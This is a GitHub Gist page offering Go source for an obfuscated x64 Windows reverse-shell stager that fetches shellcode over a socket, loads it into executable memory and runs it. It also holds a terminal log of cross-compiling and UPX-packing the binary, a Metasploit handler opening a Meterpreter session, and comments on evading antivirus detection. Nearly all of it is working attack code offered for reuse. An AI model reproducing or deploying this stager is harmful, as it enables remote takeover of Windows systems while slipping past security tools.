Last active
February 18, 2020 15:56
-
-
Save dualfade/929ac87fe66cf6eb5fc8c47becb98b91 to your computer and use it in GitHub Desktop.
Golang Obfuscated x64 reverse shell --
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "encoding/binary" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| const ( | |
| lXMIZpS = 0x1000 | |
| VcLxmtJ = 0x2000 | |
| wayikvgQuwZOKRY = 0x40 | |
| ) | |
| var ( | |
| TpsRJyKj = syscall.NewLazyDLL("kernel32.dll") | |
| HeBbAJo = TpsRJyKj.NewProc("VirtualAlloc") | |
| ) | |
| func ZOSUxNefsYMzpvV(lLQsWhDNLkJ uintptr) (uintptr, error) { | |
| RUguHNXDNuh, _, ZzdnsKGXsnEJSOb := HeBbAJo.Call(0, lLQsWhDNLkJ, VcLxmtJ|lXMIZpS, wayikvgQuwZOKRY) | |
| if RUguHNXDNuh == 0 { | |
| return 0, ZzdnsKGXsnEJSOb | |
| } | |
| return RUguHNXDNuh, nil | |
| } | |
| func main() { | |
| const pYlbbgvvOrhAHhS = 1000 << 10 | |
| var SETPHNv syscall.WSAData | |
| syscall.WSAStartup(uint32(0x202), &SETPHNv) | |
| wyebwJYVHXfDdb, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0) | |
| XNtaMXsXZ := syscall.SockaddrInet4{Port: 3434, Addr: [4]byte{10, 10, 14, 13}} | |
| syscall.Connect(wyebwJYVHXfDdb, &XNtaMXsXZ) | |
| var bHGgnYW [4]byte | |
| VmUBlihof := syscall.WSABuf{Len: uint32(4), Buf: &bHGgnYW[0]} | |
| vaHYArAaywVWGg := uint32(0) | |
| jDPnsWnMeqyaLmb := uint32(0) | |
| syscall.WSARecv(wyebwJYVHXfDdb, &VmUBlihof, 1, &jDPnsWnMeqyaLmb, &vaHYArAaywVWGg, nil, nil) | |
| mdIVYDZdxBXzau := binary.LittleEndian.Uint32(bHGgnYW[:]) | |
| HiPqRgExpeNf := make([]byte, mdIVYDZdxBXzau) | |
| var EtplhZEubJ []byte | |
| VmUBlihof = syscall.WSABuf{Len: mdIVYDZdxBXzau, Buf: &HiPqRgExpeNf[0]} | |
| vaHYArAaywVWGg = uint32(0) | |
| jDPnsWnMeqyaLmb = uint32(0) | |
| vwJWSE := uint32(0) | |
| for vwJWSE < mdIVYDZdxBXzau { | |
| syscall.WSARecv(wyebwJYVHXfDdb, &VmUBlihof, 1, &jDPnsWnMeqyaLmb, &vaHYArAaywVWGg, nil, nil) | |
| for i := 0; i < int(jDPnsWnMeqyaLmb); i++ { | |
| EtplhZEubJ = append(EtplhZEubJ, HiPqRgExpeNf[i]) | |
| } | |
| vwJWSE += jDPnsWnMeqyaLmb | |
| } | |
| dbosNYg, _ := ZOSUxNefsYMzpvV(uintptr(mdIVYDZdxBXzau + 5)) | |
| jtXOajZJPxRjsU := (*[pYlbbgvvOrhAHhS]byte)(unsafe.Pointer(dbosNYg)) | |
| xERsTYZ := (uintptr)(unsafe.Pointer(wyebwJYVHXfDdb)) | |
| jtXOajZJPxRjsU[0] = 0xBF | |
| jtXOajZJPxRjsU[1] = byte(xERsTYZ) | |
| jtXOajZJPxRjsU[2] = 0x00 | |
| jtXOajZJPxRjsU[3] = 0x00 | |
| jtXOajZJPxRjsU[4] = 0x00 | |
| for jOxXGfFyginsO, zeNNNv := range EtplhZEubJ { | |
| jtXOajZJPxRjsU[jOxXGfFyginsO+5] = zeNNNv | |
| } | |
| syscall.Syscall(dbosNYg, 0, 0, 0, 0) | |
| } | |
| 3:11:30 cdowns@7242-alpha-reticuli test GOOS=windows GOARCH=amd64 go build 3fb7Jq79.go 1 ↵ | |
| 3:11:40 cdowns@7242-alpha-reticuli test file 3fb7Jq79.exe | |
| 3fb7Jq79.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows | |
| 3:11:50 cdowns@7242-alpha-reticuli test ll 3fb7Jq79.exe | |
| -rwxr-xr-x 1 cdowns cdowns 1.6M Mar 26 03:11 3fb7Jq79.exe* | |
| 3:12:00 cdowns@7242-alpha-reticuli test upx brute 3fb7Jq79.exe | |
| Ultimate Packer for eXecutables | |
| Copyright (C) 1996 - 2018 | |
| UPX 3.95 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 26th 2018 | |
| File size Ratio Format Name | |
| -------------------- ------ ----------- ----------- | |
| upx: brute: FileNotFoundException: brute: No such file or directory | |
| 1653760 -> 836608 50.59% win64/pe 3fb7Jq79.exe | |
| Packed 1 file. | |
| 3:14:01 cdowns@7242-alpha-reticuli test ll 3fb7Jq79.exe 1 ↵ | |
| -rwxr-xr-x 1 cdowns cdowns 817K Mar 26 03:11 3fb7Jq79.exe* | |
| 3:14:12 cdowns@7242-alpha-reticuli test | |
| C:\Users\XXXXXX\Downloads>cmd /k 3fb7Jq79.exe | |
| cmd /k 3fb7Jq79.exe | |
| [*] Sending stage (206403 bytes) to 10.10.10.130 | |
| [*] Meterpreter session 1 opened (10.10.14.13:3434 -> 10.10.10.130:49985) at 2019-03-26 03:22:03 +0000 | |
| msf5 exploit(multi/handler) > sessions -l | |
| Active sessions | |
| =============== | |
| Id Name Type Information Connection | |
| -- ---- ---- ----------- ---------- | |
| 1 meterpreter x64/windows XXXXXX\Xxxxxxx @ XXXXXX 10.10.14.13:3434 -> 10.10.10.130:49985 (10.10.10.130) | |
| msf5 exploit(multi/handler) > |
Maybe if it uses HTTPS, it is not flagged.
Ah word. It's pretty old now. Try --
https://github.com/cdowns71/stuffz/blob/master/codez/go/3L9TALcw.go
Is using obfuscated function names really useful? I think it's enough to use go build -ldflags '-s -w'...?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Don't know if I'm high on drugs or worshiping Satan but the shell response time is impressive !!